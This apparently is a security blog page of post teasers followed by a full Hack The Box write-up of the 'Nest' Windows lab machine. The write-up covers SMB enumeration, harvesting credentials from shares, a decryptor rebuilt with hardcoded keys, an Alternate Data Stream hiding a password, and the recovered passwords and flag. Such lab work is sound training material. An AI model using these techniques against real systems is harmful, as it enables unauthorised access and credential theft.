I have to say I really enjoyed this machine. Cache starts with finding soms credentials, exploiting the OpenEMR webapplication and getting root by using a Docker GTFOBin. Cache really is a good educational box.
Continue readingAuthor Archives: d0p4m1n3
Gaining access to Office 365 user data without credentials
You read the title right, there is an easy way to gain access to a user’s Office 365 mailbox, attachments, and OneDrive data without stealing a username and password. This kind of attack is starting to appear more and more to replace the traditional phishing of credentials. In this blog post, I will demonstrate how this process works, and what you can do to prevent it in your Office 365 tenant.
Continue readingSimulating attacks and APT Groups with MITRE’s CALDERA
Thinking of good cybersecurity measures is a different ballgame than actually testing it. Often people think that having a good firewall, strong passwords, or anti-virus software is providing them with good protection. But only when you really test what happens during an attack, you can make sure you have the correct protection in place. This is where MITRE’s CALDERA makes your life a whole lot easier.
Continue readingHack The Box Writeup: Admirer
For me the first box again after being away from Hack The Box for a while. Admirer focuses on Adminer, the predecessors of the immensely popular phpMyAdmin. The version in question has a vulnerability that I used for the user-flag. Root was achieved by misusing an include in a python backup script.
Continue readingVeil Evasion for bypassing antivirus software
Running your awesome payload and getting it shot down by antivirus software is kind of the same as having your Lamborghini’s launch control active and seeing a Police car parking in front of you. It kind of spoils the concept. The Veil-Evasion framework is a great way to get rid of that digital police car and have your payloads evade detection by antivirus software. In this blog post, I give you some examples of how to use Veil and obfuscate the true intentions of your payloads.
Continue readingBadBlood: Active Directory object creator and security generator
We all know the issue. You just installed Active Directory Domain Services but everything is empty. To start testing you need to create all sorts of objects which cost a lot of time. This is where BadBlood comes to rescue.
Continue readingHack The Box Writeup: Remote
Since a long time a new easy box appeared on Hack The Box. Now “Easy” is a label that in the previous machines could also switch to “Medium” so always a surprise. In this case, it really was a well-qualified machine that lived up to its name. The root-flag was also accessible via a remote solution.
Continue readingShodan Eye: Search tool for Shodan
The Shodan Eye tool is part of a collection of Ethical Hacking tools written by fellow Dutchie Jolanda de Koff, a.k.a. Bulls Eye. It is a Python script to easily search Shodan and save your results locally for further analysis. Let’s give this one a try.
Continue readingHack The Box Writeup: 0ld is g0ld
This is one of those simple challenges which are a lot of fun. This one is a small tribute to Samuel Morse, the inventor of the Morse code. All you need is a PDF-cracker and a Morse code translator to grab the flag.
Continue readingHack The Box Writeup: Nest
Nest is a Window box that saw the light of day on Hack The Box on January 25 . A nice box where you are constantly exploring and taking a step further every time. There is a lot of discussion about the complexity of this box because according to the maker it qualifies as “Easy” but many find it between “Medium” and “Hard.”.
[0x1] Reconnaissance & Enumeration
The first step in exploring Nest is an Nmap scan. I opt for an extensive scan of all ports (including non-standard ports) including standard scripts and service / version detection.
nmap -sC -sV -p- -oA nest 10.10.10.178
A scan of the entire port range always takes a while. Over time, the results will come up and the scan will indicate that port 445 / tcp and 4386 / tcp are open. Port 445 / tcp is SMB and 4386 is unknown to me. According to the scan, a database reporting service is running on this.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-26 19:51 GMT Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 11.33% done; ETC: 19:56 (0:03:55 remaining) Stats: 0:05:24 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 19:57 (0:00:21 remaining) Nmap scan report for 10.10.10.178 Host is up (0.021s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-01-26T19:59:26 |_ start_date: 2020-01-26T19:44:36 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 507.00 seconds
With the help of SMBclient a number of shares emerge. Besides the standard ADMIN $, C $ and IPC $ we see a few interesting directories.
smbclient -L 10.10.10.178 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available
[0x2] Initial Foothold
Based on this list, I’m going to take a closer look at Data , Secure $ , and Users to see if any interesting information can be found. An initial foothold is good, but a set of credentials is of course better.
The Users share contains a number of user folders. These are expected to be users whose credentials can be found. For now I still miss the rights to view the folders. Continue to Data.
smbclient \\\\10.10.10.178\\users Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir . D 0 Sat Jan 25 23:04:21 2020 .. D 0 Sat Jan 25 23:04:21 2020 Administrator D 0 Fri Aug 9 16:08:23 2019 C.Smith D 0 Sun Jan 26 07:21:44 2020 L.Frost D 0 Thu Aug 8 18:03:01 2019 R.Thompson D 0 Thu Aug 8 18:02:50 2019 TempUser D 0 Wed Aug 7 23:55:56 2019 \Administrator NT_STATUS_ACCESS_DENIED listing \Administrator\* \C.Smith NT_STATUS_ACCESS_DENIED listing \C.Smith\* \L.Frost NT_STATUS_ACCESS_DENIED listing \L.Frost\* \R.Thompson NT_STATUS_ACCESS_DENIED listing \R.Thompson\* \TempUser NT_STATUS_ACCESS_DENIED listing \TempUser\* smb: \>
The Data share contains a number of nested folders and files. Useful here is the recurse command to get a complete listing.
smbclient \\\\10.10.10.178\\data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir . D 0 Wed Aug 7 23:53:46 2019 .. D 0 Wed Aug 7 23:53:46 2019 IT D 0 Wed Aug 7 23:58:07 2019 Production D 0 Mon Aug 5 22:53:38 2019 Reports D 0 Mon Aug 5 22:53:44 2019 Shared D 0 Wed Aug 7 20:07:51 2019 \IT NT_STATUS_ACCESS_DENIED listing \IT\* \Production NT_STATUS_ACCESS_DENIED listing \Production\* \Reports NT_STATUS_ACCESS_DENIED listing \Reports\* \Shared . D 0 Wed Aug 7 20:07:51 2019 .. D 0 Wed Aug 7 20:07:51 2019 Maintenance D 0 Wed Aug 7 20:07:32 2019 Templates D 0 Wed Aug 7 20:08:07 2019 \Shared\Maintenance . D 0 Wed Aug 7 20:07:32 2019 .. D 0 Wed Aug 7 20:07:32 2019 Maintenance Alerts.txt A 48 Tue Aug 6 00:01:44 2019 \Shared\Templates . D 0 Wed Aug 7 20:08:07 2019 .. D 0 Wed Aug 7 20:08:07 2019 HR D 0 Wed Aug 7 20:08:01 2019 Marketing D 0 Wed Aug 7 20:08:06 2019 \Shared\Templates\HR . D 0 Wed Aug 7 20:08:01 2019 .. D 0 Wed Aug 7 20:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019 \Shared\Templates\Marketing . D 0 Wed Aug 7 20:08:06 2019 .. D 0 Wed Aug 7 20:08:06 2019 smb: \>
Maintenance Alerts.txt and Welcome Email.txt look interesting for later.
The last share Secure $ is accessible but it is not possible to list files here. Maybe later with a set of credentials.
smbclient \\\\10.10.10.178\\secure$ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir NT_STATUS_ACCESS_DENIED listing \* smb: \>
The file Maintenance Alerts.txt only contains a message that there is no Maintenance, this is of no use to me. The second file is Welcome Email.txt and there is something interesting to find here.
\shared\Templates\HR\> dir . D 0 Wed Aug 7 20:08:01 2019 .. D 0 Wed Aug 7 20:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 23:55:36 2019 10485247 blocks of size 4096. 6448917 blocks available
After the initial foothold I now have a set of credentials from TempUser . This user was previously seen on the Users share .
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HR
[0x3] Path to User flag
Armed with freshly discovered credentials, it’s time to reconnect to the share to see if it can deliver more with TempUser.
The listing lists quite a few files in the IT \ Configs folder which look like application configuration files.
smbclient -U TempUser \\\\10.10.10.178\\data Enter WORKGROUP\TempUser's password: \IT\Configs\NotepadPlusPlus . D 0 Wed Aug 7 20:31:37 2019 .. D 0 Wed Aug 7 20:31:37 2019 config.xml A 6451 Thu Aug 8 00:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 20:30:27 2019 \IT\Configs\RU Scanner . D 0 Wed Aug 7 21:01:13 2019 .. D 0 Wed Aug 7 21:01:13 2019 RU_config.xml A 270 Thu Aug 8 20:49:37 2019 10485247 blocks of size 4096. 6448917 blocks available
After going through all the files I found a lot of noise and two interesting files. Enumeration is a thorough task and before you know it you will miss essential information.
In the folder NotepadPlusPlus I find the file Config.xml which contains a reference to three other files. Remarkable is the path to the Secure $ share that I previously visited, but could not see any folders. However, now I do have a path where a folder Carl should be. Is the previously found user folder C. Smith from Carl?
<History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
The second interesting file is RU_Config in the RU Scanner folder . The contents of this XML file represent a username and password. A quick check indicates that this password is not immediately usable and may be encrypted.
<?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
Time to take a look at the path in the NotepadPlusPlus config file.
smbclient -U TempUser \\\\10.10.10.178\\Secure$ Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir . D 0 Thu Aug 8 00:08:12 2019 .. D 0 Thu Aug 8 00:08:12 2019 Finance D 0 Wed Aug 7 20:40:13 2019 HR D 0 Thu Aug 8 00:08:11 2019 IT D 0 Thu Aug 8 11:59:25 2019 \Finance NT_STATUS_ACCESS_DENIED listing \Finance\* \HR NT_STATUS_ACCESS_DENIED listing \HR\* \IT NT_STATUS_ACCESS_DENIED listing \IT\*
The path of the file should be \\ HTB-NEST \ Secure $ \ IT \ Carl \ Temp.txt. This has kept me busy for a while before trying to enter the directory even though it says ACCESS_DENIED. As it turns out, TempUser does have rights to enter the directory, just not to list files in IT. And this does provide some interesting new content.
smb: \IT\> cd Carl smb: \IT\Carl\> recurse smb: \IT\Carl\> dir . D 0 Wed Aug 7 20:42:14 2019 .. D 0 Wed Aug 7 20:42:14 2019 Docs D 0 Wed Aug 7 20:44:00 2019 Reports D 0 Tue Aug 6 14:45:40 2019 VB Projects D 0 Tue Aug 6 15:41:55 2019 10485247 blocks of size 4096. 6448903 blocks available smb: \IT\Carl\>
RU Scanner was the folder that previously contained the encrypted password. Here seems to be a Microsoft Visual Studio Project which I download in its entirety to investigate further in Visual Studio. It is expected that the encryption method can be found here, which can provide a method to recover the plain text password.
smb: \IT\Carl\VB Projects\WIP\RU\> dir . D 0 Fri Aug 9 16:36:45 2019 .. D 0 Fri Aug 9 16:36:45 2019 RUScanner D 0 Wed Aug 7 23:05:54 2019 RUScanner.sln A 871 Tue Aug 6 15:45:36 2019 10485247 blocks of size 4096. 6448903 blocks available
After some tinkering with the project it soon became clear that for me the easiest way to retrieve the password is to call the function below and simply write the output to the console screen.
In Module1.vb I add the line below so that the decrypted password is written.
WriteLine(CInt(Utils.DecryptString(Config.Password)))
The total will then look like this:
Module Module1 Sub Main() Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml") Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)} WriteLine(CInt(Utils.DecryptString(Config.Password))) End Sub End Module
The decryption function itself can be found in Utils.vbs and uses the encrypted text, a password, salt, password iteration, Init Vector and keysize.
The script runs and returns a string as a decrypted password. Looks plausible like that right?
xRxRxPANCAK3SxRxRx
This password is usable with the username C.Smith and via smbclient I’m going to reconnect to the machine to continue searching.
The output shows some interesting things: user.txt , Debug Mode Password.txt .
smbclient -U "C.Smith" \\\\10.10.10.178\\Users Enter WORKGROUP\C.Smith's password: Try "help" to get a list of possible commands. smb: \> recurse smb: \> dir . D 0 Sat Jan 25 23:04:21 2020 .. D 0 Sat Jan 25 23:04:21 2020 Administrator D 0 Fri Aug 9 16:08:23 2019 C.Smith D 0 Sun Jan 26 07:21:44 2020 L.Frost D 0 Thu Aug 8 18:03:01 2019 R.Thompson D 0 Thu Aug 8 18:02:50 2019 TempUser D 0 Wed Aug 7 23:55:56 2019 \Administrator NT_STATUS_ACCESS_DENIED listing \Administrator\* \C.Smith . D 0 Sun Jan 26 07:21:44 2020 .. D 0 Sun Jan 26 07:21:44 2020 HQK Reporting D 0 Fri Aug 9 00:06:17 2019 user.txt A 32 Fri Aug 9 00:05:24 2019 \L.Frost NT_STATUS_ACCESS_DENIED listing \L.Frost\* \R.Thompson NT_STATUS_ACCESS_DENIED listing \R.Thompson\* \TempUser NT_STATUS_ACCESS_DENIED listing \TempUser\* \C.Smith\HQK Reporting . D 0 Fri Aug 9 00:06:17 2019 .. D 0 Fri Aug 9 00:06:17 2019 AD Integration Module D 0 Fri Aug 9 13:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 00:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 00:09:05 2019 \C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 13:18:42 2019 .. D 0 Fri Aug 9 13:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019 smb: \>
The user.txt appears to be indeed provided with the user flag and with this the first part of this machine is in the pocket!
cat user.txt cf71b25404be5d84fd827e05f426e987
[0x4] Path to Root flag
The Debug Mode Password.txt file is listed as a 0-byte file size. After downloading the file it is indeed empty, which is strange. This is a machine based on Microsoft Windows and a frequently used way of hiding information in a file is to use an Alternate Data Stream (ADS). This puts another file with content in an object property of the dummy file.
With smbclient you can use the command allinfo to display additional information about a file. This must almost be a file with an ADS.
smb: \C.Smith\HQReporting allinfo "Debug Mode Password.txt stream: [:Password:$DATA], 15 bytes
Gotcha! So there is an extra file in the dummy file. So the real file I need is called Password . I download this file in the same way as indicated in the text, so dummy file: real file.
get "Debug Mode password.txt:Password"
Now the file is 15 bytes instead of 0 bytes. The file contains another password.
WBQ201953D8w
Because many files give hints towards reporting, it’s time to visit Nest’s second port. Port 4386 already returned several commands and basic information during the scan, so I try to connect to Nest on port 4386 by telnet.
Once connected to the service I give the command help and soon see the next step, there is a DEBUG function that requires a password.
telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command>
Activating the debug mode based on the previously found password in the ADS is successful and now it is possible to execute additional commands.
>debug WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
The list command returns that I am in the ALL QUERIES folder. There is nothing else to do here.
>list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] COMPARISONS [1] Invoices (Ordered By Customer) [2] Products Sold (Ordered By Customer) [3] Products Sold In Last 30 Days
After fiddling with the commands I find out that you go back one directory with setdir … List then ensures that the contents of the folder are displayed. The contents of this folder are not usable except for the LDAP folder.
>setdir .. Current directory set to HQK >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml Current Directory: HQK
In the LDAP folder I find an executable that I encountered earlier in Carl’s folder and a config file.
>setdir LDAP Current directory set to LDAP >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap.exe [2] Ldap.conf Current Directory: LDAP
By means of showquery <id> I can retrieve the content of the file Ldap.conf and I find the username: Administrator and his password. This looks encrypted just like before and a quick check confirms this. In this form, the password cannot be used to log in directly.
>showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
I have previously saved the Windows executable in Carl’s folder and this is probably the file that creates or reads Ldap.conf and therefore also the encryption.
\C.Smith\HQK Reporting\AD Integration Module . D 0 Fri Aug 9 13:18:42 2019 .. D 0 Fri Aug 9 13:18:42 2019 HqkLdap.exe A 17408 Thu Aug 8 00:41:16 2019
Considering that it is an executable, it took some time to Googling for a free tool that can provide insight into the compiled file. I used dotPeek from JetBrains for this. After opening I soon came across similarities to the earlier Visual Basic Project and soon found the decryption function.
I couldn’t modify the file itself to do the same trick as with the Visual Studio Project. I copied the relevant code to an online .Net compiler to have the function and add something to it for processing the encrypted password and showing the outcome.
using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace HqkLdap { public class CR { private const string K = "667912"; private const string I = "1L1SA61493DRV53Z"; private const string SA = "1313Rf99"; public static string DS(string EncryptedString) { return string.IsNullOrEmpty(EncryptedString) ? string.Empty : CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } private static string RD( string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { byte[] bytes1 = Encoding.ASCII.GetBytes(initVector); byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue); byte[] buffer = Convert.FromBase64String(cipherText); byte[] bytes3 = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations).GetBytes(checked ((int) Math.Round(unchecked ((double) keySize / 8.0)))); AesCryptoServiceProvider cryptoServiceProvider = new AesCryptoServiceProvider(); cryptoServiceProvider.Mode = CipherMode.CBC; ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor(bytes3, bytes1); MemoryStream memoryStream = new MemoryStream(buffer); CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor, CryptoStreamMode.Read); byte[] numArray = new byte[checked (buffer.Length + 1)]; int count = cryptoStream.Read(numArray, 0, numArray.Length); memoryStream.Close(); cryptoStream.Close(); return Encoding.ASCII.GetString(numArray, 0, count); } public static void Main() { Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")); } } }
The last line, shown separately below, is all it takes to decrypt the string and show the original password.
Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
Thanks for playing, a password with a friendly note from the originator. This is expected to be the Administrator password, given the information in the Ldap.conf .
XtH4nkS4Pl4y1nGX
With the newly acquired password I connect to the Users share using smbclient and go to the Administrator folder . There is a file, but you can already deduce from the name that this is not the final flag for root.
smbclient -U "Administrator" \\\\10.10.10.178\\Users Enter WORKGROUP\Administrator's password: Try "help" to get a list of possible commands. smb: \> cd Administrator smb: \Administrator\> dir . D 0 Fri Aug 9 16:08:23 2019 .. D 0 Fri Aug 9 16:08:23 2019 flag.txt - Shortcut.lnk A 2384 Fri Aug 9 16:10:15 2019
The shortcut points to the Administrator’s Desktop folder which is believed to contain the root.txt .
\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
A new connection to the share C $ and through to the Administrator Desktop for the root flag. Yep, with 32 bytes, root.txt contains the root flag!
smbclient -U "Administrator" \\\\10.10.10.178\\C$ Enter WORKGROUP\Administrator's password: Try "help" to get a list of possible commands. smb: \> cd Users\Administrator\Desktop\ smb: \Users\Administrator\Desktop\> dir . DR 0 Sun Jan 26 07:20:50 2020 .. DR 0 Sun Jan 26 07:20:50 2020 desktop.ini AHS 282 Sat Jan 25 22:02:44 2020 root.txt A 32 Mon Aug 5 23:27:26 2019 10485247 blocks of size 4096. 6449467 blocks available
[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]